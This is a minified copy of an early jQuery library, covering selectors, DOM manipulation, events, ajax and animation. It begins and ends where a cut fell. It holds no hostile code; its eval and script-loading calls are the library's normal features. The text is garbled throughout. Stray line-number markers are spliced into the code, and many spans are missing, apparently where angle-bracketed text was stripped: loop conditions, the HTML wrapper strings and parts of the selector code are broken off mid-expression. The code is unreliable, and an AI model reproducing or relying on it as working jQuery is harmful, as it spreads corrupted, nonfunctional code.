events[type])jQuery.event.add(clone[i],type,events[type][handler],events[type][handler].data);});return ret;},filter:function(selector){return this.pushStack(jQuery.isFunction(selector)&&jQuery.grep(this,function(elem,i){return selector.call(elem,i);})||jQuery.multiFilter(selector,this));},not:function(selector){if(selector.constructor==String)if(isSimple.test(selector))return this.pushStack(jQuery.multiFilter(selector,this,true));else 15 | selector=jQuery.multiFilter(selector,this);var isArrayLike=selector.length&&selector[selector.length-1]!==undefined&&!selector.nodeType;return this.filter(function(){return isArrayLike?jQuery.inArray(this,selector)<0:this!=selector;});},add:function(selector){return!selector?this:this.pushStack(jQuery.merge(this.get(),selector.constructor==String?jQuery(selector).get():selector.length!=undefined&&(!selector.nodeName||jQuery.nodeName(selector,"form"))?selector:[selector]));},is:function(selector){return selector?jQuery.multiFilter(selector,this).length>0:false;},hasClass:function(selector){return this.is("."+selector);},val:function(value){if(value==undefined){if(this.length){var elem=this[0];if(jQuery.nodeName(elem,"select")){var index=elem.selectedIndex,values=[],options=elem.options,one=elem.type=="select-one";if(index<0)return null;for(var i=one?index:0,max=one?index+1:options.length;i=0||jQuery.inArray(this.name,value)>=0);else if(jQuery.nodeName(this,"select")){var values=value.constructor==Array?value:[value];jQuery("option",this).each(function(){this.selected=(jQuery.inArray(this.value,values)>=0||jQuery.inArray(this.text,values)>=0);});if(!values.length)this.selectedIndex=-1;}else 17 | this.value=value;});},html:function(value){return value==undefined?(this.length?this[0].innerHTML:null):this.empty().append(value);},replaceWith:function(value){return this.after(value).remove();},eq:function(i){return this.slice(i,i+1);},slice:function(){return this.pushStack(Array.prototype.slice.apply(this,arguments));},map:function(callback){return this.pushStack(jQuery.map(this,function(elem,i){return callback.call(elem,i,elem);}));},andSelf:function(){return this.add(this.prevObject);},data:function(key,value){var parts=key.split(".");parts[1]=parts[1]?"."+parts[1]:"";if(value==null){var data=this.triggerHandler("getData"+parts[1]+"!",[parts[0]]);if(data==undefined&&this.length)data=jQuery.data(this[0],key);return data==null&&parts[1]?this.data(parts[0]):data;}else 18 | return this.trigger("setData"+parts[1]+"!",[parts[0],value]).each(function(){jQuery.data(this,key,value);});},removeData:function(key){return this.each(function(){jQuery.removeData(this,key);});},domManip:function(args,table,reverse,callback){var clone=this.length>1,elems;return this.each(function(){if(!elems){elems=jQuery.clean(args,this.ownerDocument);if(reverse)elems.reverse();}var obj=this;if(table&&jQuery.nodeName(this,"table")&&jQuery.nodeName(elems[0],"tr"))obj=this.getElementsByTagName("tbody")[0]||this.appendChild(this.ownerDocument.createElement("tbody"));var scripts=jQuery([]);jQuery.each(elems,function(){var elem=clone?jQuery(this).clone(true)[0]:this;if(jQuery.nodeName(elem,"script")){scripts=scripts.add(elem);}else{if(elem.nodeType==1)scripts=scripts.add(jQuery("script",elem).remove());callback.call(obj,elem);}});scripts.each(evalScript);});}};jQuery.prototype.init.prototype=jQuery.prototype;function evalScript(i,elem){if(elem.src)jQuery.ajax({url:elem.src,async:false,dataType:"script"});else 19 | jQuery.globalEval(elem.text||elem.textContent||elem.innerHTML||"");if(elem.parentNode)elem.parentNode.removeChild(elem);}jQuery.extend=jQuery.fn.extend=function(){var target=arguments[0]||{},i=1,length=arguments.length,deep=false,options;if(target.constructor==Boolean){deep=target;target=arguments[1]||{};i=2;}if(typeof target!="object"&&typeof target!="function")target={};if(length==1){target=this;i=0;}for(;i-1;}},swap:function(elem,options,callback){var old={};for(var name in options){old[name]=elem.style[name];elem.style[name]=options[name];}callback.call(elem);for(var name in options)elem.style[name]=old[name];},css:function(elem,name,force){if(name=="width"||name=="height"){var val,props={position:"absolute",visibility:"hidden",display:"block"},which=name=="width"?["Left","Right"]:["Top","Bottom"];function getWH(){val=name=="width"?elem.offsetWidth:elem.offsetHeight;var padding=0,border=0;jQuery.each(which,function(){padding+=parseFloat(jQuery.curCSS(elem,"padding"+this,true))||0;border+=parseFloat(jQuery.curCSS(elem,"border"+this+"Width",true))||0;});val-=Math.round(padding+border);}if(jQuery(elem).is(":visible"))getWH();else 23 | jQuery.swap(elem,props,getWH);return Math.max(0,val);}return jQuery.curCSS(elem,name,force);},curCSS:function(elem,name,force){var ret;function color(elem){if(!jQuery.browser.safari)return false;var ret=document.defaultView.getComputedStyle(elem,null);return!ret||ret.getPropertyValue("color")=="";}if(name=="opacity"&&jQuery.browser.msie){ret=jQuery.attr(elem.style,"opacity");return ret==""?"1":ret;}if(jQuery.browser.opera&&name=="display"){var save=elem.style.outline;elem.style.outline="0 solid black";elem.style.outline=save;}if(name.match(/float/i))name=styleFloat;if(!force&&elem.style&&elem.style[name])ret=elem.style[name];else if(document.defaultView&&document.defaultView.getComputedStyle){if(name.match(/float/i))name="float";name=name.replace(/([A-Z])/g,"-$1").toLowerCase();var getComputedStyle=document.defaultView.getComputedStyle(elem,null);if(getComputedStyle&&!color(elem))ret=getComputedStyle.getPropertyValue(name);else{var swap=[],stack=[];for(var a=elem;a&&color(a);a=a.parentNode)stack.unshift(a);for(var i=0;i]*?)\/>/g,function(all,front,tag){return tag.match(/^(abbr|br|col|img|input|link|meta|param|hr|area|embed)$/i)?all:front+">";});var tags=jQuery.trim(elem).toLowerCase(),div=context.createElement("div");var wrap=!tags.indexOf("",""]||!tags.indexOf("",""]||tags.match(/^<(thead|tbody|tfoot|colg|cap)/)&&[1,"","
"]||!tags.indexOf("",""]||(!tags.indexOf("",""]||!tags.indexOf("",""]||jQuery.browser.msie&&[1,"div
","
"]||[0,"",""];div.innerHTML=wrap[1]+elem+wrap[2];while(wrap[0]--)div=div.lastChild;if(jQuery.browser.msie){var tbody=!tags.indexOf(""&&tags.indexOf("=0;--j)if(jQuery.nodeName(tbody[j],"tbody")&&!tbody[j].childNodes.length)tbody[j].parentNode.removeChild(tbody[j]);if(/^\s/.test(elem))div.insertBefore(context.createTextNode(elem.match(/^\s*/)[0]),div.firstChild);}elem=jQuery.makeArray(div.childNodes);}if(elem.length===0&&(!jQuery.nodeName(elem,"form")&&!jQuery.nodeName(elem,"select")))return;if(elem[0]==undefined||jQuery.nodeName(elem,"form")||elem.options)ret.push(elem);else 24 | ret=jQuery.merge(ret,elem);});return ret;},attr:function(elem,name,value){if(!elem||elem.nodeType==3||elem.nodeType==8)return undefined;var fix=jQuery.isXMLDoc(elem)?{}:jQuery.props;if(name=="selected"&&jQuery.browser.safari)elem.parentNode.selectedIndex;if(fix[name]){if(value!=undefined)elem[fix[name]]=value;return elem[fix[name]];}else if(jQuery.browser.msie&&name=="style")return jQuery.attr(elem.style,"cssText",value);else if(value==undefined&&jQuery.browser.msie&&jQuery.nodeName(elem,"form")&&(name=="action"||name=="method"))return elem.getAttributeNode(name).nodeValue;else if(elem.tagName){if(value!=undefined){if(name=="type"&&jQuery.nodeName(elem,"input")&&elem.parentNode)throw"type property can't be changed";elem.setAttribute(name,""+value);}if(jQuery.browser.msie&&/href|src/.test(name)&&!jQuery.isXMLDoc(elem))return elem.getAttribute(name,2);return elem.getAttribute(name);}else{if(name=="opacity"&&jQuery.browser.msie){if(value!=undefined){elem.zoom=1;elem.filter=(elem.filter||"").replace(/alpha\([^)]*\)/,"")+(parseFloat(value).toString()=="NaN"?"":"alpha(opacity="+value*100+")");}return elem.filter&&elem.filter.indexOf("opacity=")>=0?(parseFloat(elem.filter.match(/opacity=([^)]*)/)[1])/100).toString():"";}name=name.replace(/-([a-z])/ig,function(all,letter){return letter.toUpperCase();});if(value!=undefined)elem[name]=value;return elem[name];}},trim:function(text){return(text||"").replace(/^\s+|\s+$/g,"");},makeArray:function(array){var ret=[];if(typeof array!="array")for(var i=0,length=array.length;i*",this).remove();while(this.firstChild)this.removeChild(this.firstChild);}},function(name,fn){jQuery.fn[name]=function(){return this.each(fn,arguments);};});jQuery.each(["Height","Width"],function(i,name){var type=name.toLowerCase();jQuery.fn[type]=function(size){return this[0]==window?jQuery.browser.opera&&document.body["client"+name]||jQuery.browser.safari&&window["inner"+name]||document.compatMode=="CSS1Compat"&&document.documentElement["client"+name]||document.body["client"+name]:this[0]==document?Math.max(Math.max(document.body["scroll"+name],document.documentElement["scroll"+name]),Math.max(document.body["offset"+name],document.documentElement["offset"+name])):size==undefined?(this.length?jQuery.css(this[0],type):null):this.css(type,size.constructor==String?size:size+"px");};});var chars=jQuery.browser.safari&&parseInt(jQuery.browser.version)<417?"(?:[\\w*_-]|\\\\.)":"(?:[\\w\u0128-\uFFFF*_-]|\\\\.)",quickChild=new RegExp("^>\\s*("+chars+"+)"),quickID=new RegExp("^("+chars+"+)(#)("+chars+"+)"),quickClass=new RegExp("^([#.]?)("+chars+"*)");jQuery.extend({expr:{"":function(a,i,m){return m[2]=="*"||jQuery.nodeName(a,m[2]);},"#":function(a,i,m){return a.getAttribute("id")==m[2];},":":{lt:function(a,i,m){return im[3]-0;},nth:function(a,i,m){return m[3]-0==i;},eq:function(a,i,m){return m[3]-0==i;},first:function(a,i){return i==0;},last:function(a,i,m,r){return i==r.length-1;},even:function(a,i){return i%2==0;},odd:function(a,i){return i%2;},"first-child":function(a){return a.parentNode.getElementsByTagName("*")[0]==a;},"last-child":function(a){return jQuery.nth(a.parentNode.lastChild,1,"previousSibling")==a;},"only-child":function(a){return!jQuery.nth(a.parentNode.lastChild,2,"previousSibling");},parent:function(a){return a.firstChild;},empty:function(a){return!a.firstChild;},contains:function(a,i,m){return(a.textContent||a.innerText||jQuery(a).text()||"").indexOf(m[3])>=0;},visible:function(a){return"hidden"!=a.type&&jQuery.css(a,"display")!="none"&&jQuery.css(a,"visibility")!="hidden";},hidden:function(a){return"hidden"==a.type||jQuery.css(a,"display")=="none"||jQuery.css(a,"visibility")=="hidden";},enabled:function(a){return!a.disabled;},disabled:function(a){return a.disabled;},checked:function(a){return a.checked;},selected:function(a){return a.selected||jQuery.attr(a,"selected");},text:function(a){return"text"==a.type;},radio:function(a){return"radio"==a.type;},checkbox:function(a){return"checkbox"==a.type;},file:function(a){return"file"==a.type;},password:function(a){return"password"==a.type;},submit:function(a){return"submit"==a.type;},image:function(a){return"image"==a.type;},reset:function(a){return"reset"==a.type;},button:function(a){return"button"==a.type||jQuery.nodeName(a,"button");},input:function(a){return/input|select|textarea|button/i.test(a.nodeName);},has:function(a,i,m){return jQuery.find(m[3],a).length;},header:function(a){return/h\d/i.test(a.nodeName);},animated:function(a){return jQuery.grep(jQuery.timers,function(fn){return a==fn.elem;}).length;}}},parse:[/^(\[) *@?([\w-]+) *([!*$^~=]*) *('?"?)(.*?)\4 *\]/,/^(:)([\w-]+)\("?'?(.*?(\(.*?\))?[^(]*?)"?'?\)/,new RegExp("^([:.#]*)("+chars+"+)")],multiFilter:function(expr,elems,not){var old,cur=[];while(expr&&expr!=old){old=expr;var f=jQuery.filter(expr,elems,not);expr=f.t.replace(/^\s*,\s*/,"");cur=not?elems=f.r:jQuery.merge(cur,f.r);}return cur;},find:function(t,context){if(typeof t!="string")return[t];if(context&&context.nodeType!=1&&context.nodeType!=9)return[];context=context||document;var ret=[context],done=[],last,nodeName;while(t&&last!=t){var r=[];last=t;t=jQuery.trim(t);var foundToken=false;var re=quickChild;var m=re.exec(t);if(m){nodeName=m[1].toUpperCase();for(var i=0;ret[i];i++)for(var c=ret[i].firstChild;c;c=c.nextSibling)if(c.nodeType==1&&(nodeName=="*"||c.nodeName.toUpperCase()==nodeName))r.push(c);ret=r;t=t.replace(re,"");if(t.indexOf(" ")==0)continue;foundToken=true;}else{re=/^([>+~])\s*(\w*)/i;if((m=re.exec(t))!=null){r=[];var merge={};nodeName=m[2].toUpperCase();m=m[1];for(var j=0,rl=ret.length;j=0;if(!not&&pass||not&&!pass)tmp.push(r[i]);}return tmp;},filter:function(t,r,not){var last;while(t&&t!=last){last=t;var p=jQuery.parse,m;for(var i=0;p[i];i++){m=p[i].exec(t);if(m){t=t.substring(m[0].length);m[2]=m[2].replace(/\\/g,"");break;}}if(!m)break;if(m[1]==":"&&m[2]=="not")r=isSimple.test(m[3])?jQuery.filter(m[3],r,true).r:jQuery(r).not(m[3]);else if(m[1]==".")r=jQuery.classFilter(r,m[2],not);else if(m[1]=="["){var tmp=[],type=m[3];for(var i=0,rl=r.length;i=0)^not)tmp.push(a);}r=tmp;}else if(m[1]==":"&&m[2]=="nth-child"){var merge={},tmp=[],test=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(m[3]=="even"&&"2n"||m[3]=="odd"&&"2n+1"||!/\D/.test(m[3])&&"0n+"+m[3]||m[3]),first=(test[1]+(test[2]||1))-0,last=test[3]-0;for(var i=0,rl=r.length;i=0)add=true;if(add^not)tmp.push(node);}r=tmp;}else{var fn=jQuery.expr[m[1]];if(typeof fn=="object")fn=fn[m[2]];if(typeof fn=="string")fn=eval("false||function(a,i){return "+fn+";}");r=jQuery.grep(r,function(elem,i){return fn(elem,i,m,r);},not);}}return{r:r,t:t};},dir:function(elem,dir){var matched=[];var cur=elem[dir];while(cur&&cur!=document){if(cur.nodeType==1)matched.push(cur);cur=cur[dir];}return matched;},nth:function(cur,result,dir,elem){result=result||1;var num=0;for(;cur;cur=cur[dir])if(cur.nodeType==1&&++num==result)break;return cur;},sibling:function(n,elem){var r=[];for(;n;n=n.nextSibling){if(n.nodeType==1&&(!elem||n!=elem))r.push(n);}return r;}});jQuery.event={add:function(elem,types,handler,data){if(elem.nodeType==3||elem.nodeType==8)return;if(jQuery.browser.msie&&elem.setInterval!=undefined)elem=window;if(!handler.guid)handler.guid=this.guid++;if(data!=undefined){var fn=handler;handler=function(){return fn.apply(this,arguments);};handler.data=data;handler.guid=fn.guid;}var events=jQuery.data(elem,"events")||jQuery.data(elem,"events",{}),handle=jQuery.data(elem,"handle")||jQuery.data(elem,"handle",function(){var val;if(typeof jQuery=="undefined"||jQuery.event.triggered)return val;val=jQuery.event.handle.apply(arguments.callee.elem,arguments);return val;});handle.elem=elem;jQuery.each(types.split(/\s+/),function(index,type){var parts=type.split(".");type=parts[0];handler.type=parts[1];var handlers=events[type];if(!handlers){handlers=events[type]={};if(!jQuery.event.special[type]||jQuery.event.special[type].setup.call(elem)===false){if(elem.addEventListener)elem.addEventListener(type,handle,false);else if(elem.attachEvent)elem.attachEvent("on"+type,handle);}}handlers[handler.guid]=handler;jQuery.event.global[type]=true;});elem=null;},guid:1,global:{},remove:function(elem,types,handler){if(elem.nodeType==3||elem.nodeType==8)return;var events=jQuery.data(elem,"events"),ret,index;if(events){if(types==undefined||(typeof types=="string"&&types.charAt(0)=="."))for(var type in events)this.remove(elem,type+(types||""));else{if(types.type){handler=types.handler;types=types.type;}jQuery.each(types.split(/\s+/),function(index,type){var parts=type.split(".");type=parts[0];if(events[type]){if(handler)delete events[type][handler.guid];else 27 | for(handler in events[type])if(!parts[1]||events[type][handler].type==parts[1])delete events[type][handler];for(ret in events[type])break;if(!ret){if(!jQuery.event.special[type]||jQuery.event.special[type].teardown.call(elem)===false){if(elem.removeEventListener)elem.removeEventListener(type,jQuery.data(elem,"handle"),false);else if(elem.detachEvent)elem.detachEvent("on"+type,jQuery.data(elem,"handle"));}ret=null;delete events[type];}}});}for(ret in events)break;if(!ret){var handle=jQuery.data(elem,"handle");if(handle)handle.elem=null;jQuery.removeData(elem,"events");jQuery.removeData(elem,"handle");}}},trigger:function(type,data,elem,donative,extra){data=jQuery.makeArray(data||[]);if(type.indexOf("!")>=0){type=type.slice(0,-1);var exclusive=true;}if(!elem){if(this.global[type])jQuery("*").add([window,document]).trigger(type,data);}else{if(elem.nodeType==3||elem.nodeType==8)return undefined;var val,ret,fn=jQuery.isFunction(elem[type]||null),event=!data[0]||!data[0].preventDefault;if(event)data.unshift(this.fix({type:type,target:elem}));data[0].type=type;if(exclusive)data[0].exclusive=true;if(jQuery.isFunction(jQuery.data(elem,"handle")))val=jQuery.data(elem,"handle").apply(elem,data);if(!fn&&elem["on"+type]&&elem["on"+type].apply(elem,data)===false)val=false;if(event)data.shift();if(extra&&jQuery.isFunction(extra)){ret=extra.apply(elem,val==null?data:data.concat(val));if(ret!==undefined)val=ret;}if(fn&&donative!==false&&val!==false&&!(jQuery.nodeName(elem,'a')&&type=="click")){this.triggered=true;try{elem[type]();}catch(e){}}this.triggered=false;}return val;},handle:function(event){var val;event=jQuery.event.fix(event||window.event||{});var parts=event.type.split(".");event.type=parts[0];var handlers=jQuery.data(this,"events")&&jQuery.data(this,"events")[event.type],args=Array.prototype.slice.call(arguments,1);args.unshift(event);for(var j in handlers){var handler=handlers[j];args[0].handler=handler;args[0].data=handler.data;if(!parts[1]&&!event.exclusive||handler.type==parts[1]){var ret=handler.apply(this,args);if(val!==false)val=ret;if(ret===false){event.preventDefault();event.stopPropagation();}}}if(jQuery.browser.msie)event.target=event.preventDefault=event.stopPropagation=event.handler=event.data=null;return val;},fix:function(event){var originalEvent=event;event=jQuery.extend({},originalEvent);event.preventDefault=function(){if(originalEvent.preventDefault)originalEvent.preventDefault();originalEvent.returnValue=false;};event.stopPropagation=function(){if(originalEvent.stopPropagation)originalEvent.stopPropagation();originalEvent.cancelBubble=true;};if(!event.target)event.target=event.srcElement||document;if(event.target.nodeType==3)event.target=originalEvent.target.parentNode;if(!event.relatedTarget&&event.fromElement)event.relatedTarget=event.fromElement==event.target?event.toElement:event.fromElement;if(event.pageX==null&&event.clientX!=null){var doc=document.documentElement,body=document.body;event.pageX=event.clientX+(doc&&doc.scrollLeft||body&&body.scrollLeft||0)-(doc.clientLeft||0);event.pageY=event.clientY+(doc&&doc.scrollTop||body&&body.scrollTop||0)-(doc.clientTop||0);}if(!event.which&&((event.charCode||event.charCode===0)?event.charCode:event.keyCode))event.which=event.charCode||event.keyCode;if(!event.metaKey&&event.ctrlKey)event.metaKey=event.ctrlKey;if(!event.which&&event.button)event.which=(event.button&1?1:(event.button&2?3:(event.button&4?2:0)));return event;},special:{ready:{setup:function(){bindReady();return;},teardown:function(){return;}},mouseenter:{setup:function(){if(jQuery.browser.msie)return false;jQuery(this).bind("mouseover",jQuery.event.special.mouseenter.handler);return true;},teardown:function(){if(jQuery.browser.msie)return false;jQuery(this).unbind("mouseover",jQuery.event.special.mouseenter.handler);return true;},handler:function(event){if(withinElement(event,this))return true;arguments[0].type="mouseenter";return jQuery.event.handle.apply(this,arguments);}},mouseleave:{setup:function(){if(jQuery.browser.msie)return false;jQuery(this).bind("mouseout",jQuery.event.special.mouseleave.handler);return true;},teardown:function(){if(jQuery.browser.msie)return false;jQuery(this).unbind("mouseout",jQuery.event.special.mouseleave.handler);return true;},handler:function(event){if(withinElement(event,this))return true;arguments[0].type="mouseleave";return jQuery.event.handle.apply(this,arguments);}}}};jQuery.fn.extend({bind:function(type,data,fn){return type=="unload"?this.one(type,data,fn):this.each(function(){jQuery.event.add(this,type,fn||data,fn&&data);});},one:function(type,data,fn){return this.each(function(){jQuery.event.add(this,type,function(event){jQuery(this).unbind(event);return(fn||data).apply(this,arguments);},fn&&data);});},unbind:function(type,fn){return this.each(function(){jQuery.event.remove(this,type,fn);});},trigger:function(type,data,fn){return this.each(function(){jQuery.event.trigger(type,data,this,true,fn);});},triggerHandler:function(type,data,fn){if(this[0])return jQuery.event.trigger(type,data,this[0],false,fn);return undefined;},toggle:function(){var args=arguments;return this.click(function(event){this.lastToggle=0==this.lastToggle?1:0;event.preventDefault();return args[this.lastToggle].apply(this,arguments)||false;});},hover:function(fnOver,fnOut){return this.bind('mouseenter',fnOver).bind('mouseleave',fnOut);},ready:function(fn){bindReady();if(jQuery.isReady)fn.call(document,jQuery);else 28 | jQuery.readyList.push(function(){return fn.call(this,jQuery);});return this;}});jQuery.extend({isReady:false,readyList:[],ready:function(){if(!jQuery.isReady){jQuery.isReady=true;if(jQuery.readyList){jQuery.each(jQuery.readyList,function(){this.apply(document);});jQuery.readyList=null;}jQuery(document).triggerHandler("ready");}}});var readyBound=false;function bindReady(){if(readyBound)return;readyBound=true;if(document.addEventListener&&!jQuery.browser.opera)document.addEventListener("DOMContentLoaded",jQuery.ready,false);if(jQuery.browser.msie&&window==top)(function(){if(jQuery.isReady)return;try{document.documentElement.doScroll("left");}catch(error){setTimeout(arguments.callee,0);return;}jQuery.ready();})();if(jQuery.browser.opera)document.addEventListener("DOMContentLoaded",function(){if(jQuery.isReady)return;for(var i=0;i=0){var selector=url.slice(off,url.length);url=url.slice(0,off);}callback=callback||function(){};var type="GET";if(params)if(jQuery.isFunction(params)){callback=params;params=null;}else{params=jQuery.param(params);type="POST";}var self=this;jQuery.ajax({url:url,type:type,dataType:"html",data:params,complete:function(res,status){if(status=="success"||status=="notmodified")self.html(selector?jQuery("
").append(res.responseText.replace(//g,"")).find(selector):res.responseText);self.each(callback,[res.responseText,status,res]);}});return this;},serialize:function(){return jQuery.param(this.serializeArray());},serializeArray:function(){return this.map(function(){return jQuery.nodeName(this,"form")?jQuery.makeArray(this.elements):this;}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password/i.test(this.type));}).map(function(i,elem){var val=jQuery(this).val();return val==null?null:val.constructor==Array?jQuery.map(val,function(val,i){return{name:elem.name,value:val};}):{name:elem.name,value:val};}).get();}});jQuery.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","),function(i,o){jQuery.fn[o]=function(f){return this.bind(o,f);};});var jsc=(new Date).getTime();jQuery.extend({get:function(url,data,callback,type){if(jQuery.isFunction(data)){callback=data;data=null;}return jQuery.ajax({type:"GET",url:url,data:data,success:callback,dataType:type});},getScript:function(url,callback){return jQuery.get(url,null,callback,"script");},getJSON:function(url,data,callback){return jQuery.get(url,data,callback,"json");},post:function(url,data,callback,type){if(jQuery.isFunction(data)){callback=data;data={};}return jQuery.ajax({type:"POST",url:url,data:data,success:callback,dataType:type});},ajaxSetup:function(settings){jQuery.extend(jQuery.ajaxSettings,settings);},ajaxSettings:{global:true,type:"GET",timeout:0,contentType:"application/x-www-form-urlencoded",processData:true,async:true,data:null,username:null,password:null,accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},ajax:function(s){var jsonp,jsre=/=\?(&|$)/g,status,data;s=jQuery.extend(true,s,jQuery.extend(true,{},jQuery.ajaxSettings,s));if(s.data&&s.processData&&typeof s.data!="string")s.data=jQuery.param(s.data);if(s.dataType=="jsonp"){if(s.type.toLowerCase()=="get"){if(!s.url.match(jsre))s.url+=(s.url.match(/\?/)?"&":"?")+(s.jsonp||"callback")+"=?";}else if(!s.data||!s.data.match(jsre))s.data=(s.data?s.data+"&":"")+(s.jsonp||"callback")+"=?";s.dataType="json";}if(s.dataType=="json"&&(s.data&&s.data.match(jsre)||s.url.match(jsre))){jsonp="jsonp"+jsc++;if(s.data)s.data=(s.data+"").replace(jsre,"="+jsonp+"$1");s.url=s.url.replace(jsre,"="+jsonp+"$1");s.dataType="script";window[jsonp]=function(tmp){data=tmp;success();complete();window[jsonp]=undefined;try{delete window[jsonp];}catch(e){}if(head)head.removeChild(script);};}if(s.dataType=="script"&&s.cache==null)s.cache=false;if(s.cache===false&&s.type.toLowerCase()=="get"){var ts=(new Date()).getTime();var ret=s.url.replace(/(\?|&)_=.*?(&|$)/,"$1_="+ts+"$2");s.url=ret+((ret==s.url)?(s.url.match(/\?/)?"&":"?")+"_="+ts:"");}if(s.data&&s.type.toLowerCase()=="get"){s.url+=(s.url.match(/\?/)?"&":"?")+s.data;s.data=null;}if(s.global&&!jQuery.active++)jQuery.event.trigger("ajaxStart");if((!s.url.indexOf("http")||!s.url.indexOf("//"))&&s.dataType=="script"&&s.type.toLowerCase()=="get"){var head=document.getElementsByTagName("head")[0];var script=document.createElement("script");script.src=s.url;if(s.scriptCharset)script.charset=s.scriptCharset;if(!jsonp){var done=false;script.onload=script.onreadystatechange=function(){if(!done&&(!this.readyState||this.readyState=="loaded"||this.readyState=="complete")){done=true;success();complete();head.removeChild(script);}};}head.appendChild(script);return undefined;}var requestDone=false;var xml=window.ActiveXObject?new ActiveXObject("Microsoft.XMLHTTP"):new XMLHttpRequest();xml.open(s.type,s.url,s.async,s.username,s.password);try{if(s.data)xml.setRequestHeader("Content-Type",s.contentType);if(s.ifModified)xml.setRequestHeader("If-Modified-Since",jQuery.lastModified[s.url]||"Thu, 01 Jan 1970 00:00:00 GMT");xml.setRequestHeader("X-Requested-With","XMLHttpRequest");xml.setRequestHeader("Accept",s.dataType&&s.accepts[s.dataType]?s.accepts[s.dataType]+", */*":s.accepts._default);}catch(e){}if(s.beforeSend)s.beforeSend(xml);if(s.global)jQuery.event.trigger("ajaxSend",[xml,s]);var onreadystatechange=function(isTimeout){if(!requestDone&&xml&&(xml.readyState==4||isTimeout=="timeout")){requestDone=true;if(ival){clearInterval(ival);ival=null;}status=isTimeout=="timeout"&&"timeout"||!jQuery.httpSuccess(xml)&&"error"||s.ifModified&&jQuery.httpNotModified(xml,s.url)&&"notmodified"||"success";if(status=="success"){try{data=jQuery.httpData(xml,s.dataType);}catch(e){status="parsererror";}}if(status=="success"){var modRes;try{modRes=xml.getResponseHeader("Last-Modified");}catch(e){}if(s.ifModified&&modRes)jQuery.lastModified[s.url]=modRes;if(!jsonp)success();}else 29 | jQuery.handleError(s,xml,status);complete();if(s.async)xml=null;}};if(s.async){var ival=setInterval(onreadystatechange,13);if(s.timeout>0)setTimeout(function(){if(xml){xml.abort();if(!requestDone)onreadystatechange("timeout");}},s.timeout);}try{xml.send(s.data);}catch(e){jQuery.handleError(s,xml,null,e);}if(!s.async)onreadystatechange();function success(){if(s.success)s.success(data,status);if(s.global)jQuery.event.trigger("ajaxSuccess",[xml,s]);}function complete(){if(s.complete)s.complete(xml,status);if(s.global)jQuery.event.trigger("ajaxComplete",[xml,s]);if(s.global&&!--jQuery.active)jQuery.event.trigger("ajaxStop");}return xml;},handleError:function(s,xml,status,e){if(s.error)s.error(xml,status,e);if(s.global)jQuery.event.trigger("ajaxError",[xml,s,e]);},active:0,httpSuccess:function(r){try{return!r.status&&location.protocol=="file:"||(r.status>=200&&r.status<300)||r.status==304||r.status==1223||jQuery.browser.safari&&r.status==undefined;}catch(e){}return false;},httpNotModified:function(xml,url){try{var xmlRes=xml.getResponseHeader("Last-Modified");return xml.status==304||xmlRes==jQuery.lastModified[url]||jQuery.browser.safari&&xml.status==undefined;}catch(e){}return false;},httpData:function(r,type){var ct=r.getResponseHeader("content-type");var xml=type=="xml"||!type&&ct&&ct.indexOf("xml")>=0;var data=xml?r.responseXML:r.responseText;if(xml&&data.documentElement.tagName=="parsererror")throw"parsererror";if(type=="script")jQuery.globalEval(data);if(type=="json")data=eval("("+data+")");return data;},param:function(a){var s=[];if(a.constructor==Array||a.jquery)jQuery.each(a,function(){s.push(encodeURIComponent(this.name)+"="+encodeURIComponent(this.value));});else 30 | for(var j in a)if(a[j]&&a[j].constructor==Array)jQuery.each(a[j],function(){s.push(encodeURIComponent(j)+"="+encodeURIComponent(this));});else 31 | s.push(encodeURIComponent(j)+"="+encodeURIComponent(a[j]));return s.join("&").replace(/%20/g,"+");}});jQuery.fn.extend({show:function(speed,callback){return speed?this.animate({height:"show",width:"show",opacity:"show"},speed,callback):this.filter(":hidden").each(function(){this.style.display=this.oldblock||"";if(jQuery.css(this,"display")=="none"){var elem=jQuery("<"+this.tagName+" />").appendTo("body");this.style.display=elem.css("display");if(this.style.display=="none")this.style.display="block";elem.remove();}}).end();},hide:function(speed,callback){return speed?this.animate({height:"hide",width:"hide",opacity:"hide"},speed,callback):this.filter(":visible").each(function(){this.oldblock=this.oldblock||jQuery.css(this,"display");this.style.display="none";}).end();},_toggle:jQuery.fn.toggle,toggle:function(fn,fn2){return jQuery.isFunction(fn)&&jQuery.isFunction(fn2)?this._toggle(fn,fn2):fn?this.animate({height:"toggle",width:"toggle",opacity:"toggle"},fn,fn2):this.each(function(){jQuery(this)[jQuery(this).is(":hidden")?"show":"hide"]();});},slideDown:function(speed,callback){return this.animate({height:"show"},speed,callback);},slideUp:function(speed,callback){return this.animate({height:"hide"},speed,callback);},slideToggle:function(speed,callback){return this.animate({height:"toggle"},speed,callback);},fadeIn:function(speed,callback){return this.animate({opacity:"show"},speed,callback);},fadeOut:function(speed,callback){return this.animate({opacity:"hide"},speed,callback);},fadeTo:function(speed,to,callback){return this.animate({opacity:to},speed,callback);},animate:function(prop,speed,easing,callback){var optall=jQuery.speed(speed,easing,callback);return this[optall.queue===false?"each":"queue"](function(){if(this.nodeType!=1)return false;var opt=jQuery.extend({},optall);var hidden=jQuery(this).is(":hidden"),self=this;for(var p in prop){if(prop[p]=="hide"&&hidden||prop[p]=="show"&&!hidden)return jQuery.isFunction(opt.complete)&&opt.complete.apply(this);if(p=="height"||p=="width"){opt.display=jQuery.css(this,"display");opt.overflow=this.style.overflow;}}if(opt.overflow!=null)this.style.overflow="hidden";opt.curAnim=jQuery.extend({},prop);jQuery.each(prop,function(name,val){var e=new jQuery.fx(self,opt,name);if(/toggle|show|hide/.test(val))e[val=="toggle"?hidden?"show":"hide":val](prop);else{var parts=val.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),start=e.cur(true)||0;if(parts){var end=parseFloat(parts[2]),unit=parts[3]||"px";if(unit!="px"){self.style[name]=(end||1)+unit;start=((end||1)/e.cur(true))*start;self.style[name]=start+unit;}if(parts[1])end=((parts[1]=="-="?-1:1)*end)+start;e.custom(start,end,unit);}else 32 | e.custom(start,val,"");}});return true;});},queue:function(type,fn){if(jQuery.isFunction(type)||(type&&type.constructor==Array)){fn=type;type="fx";}if(!type||(typeof type=="string"&&!fn))return queue(this[0],type);return this.each(function(){if(fn.constructor==Array)queue(this,type,fn);else{queue(this,type).push(fn);if(queue(this,type).length==1)fn.apply(this);}});},stop:function(clearQueue,gotoEnd){var 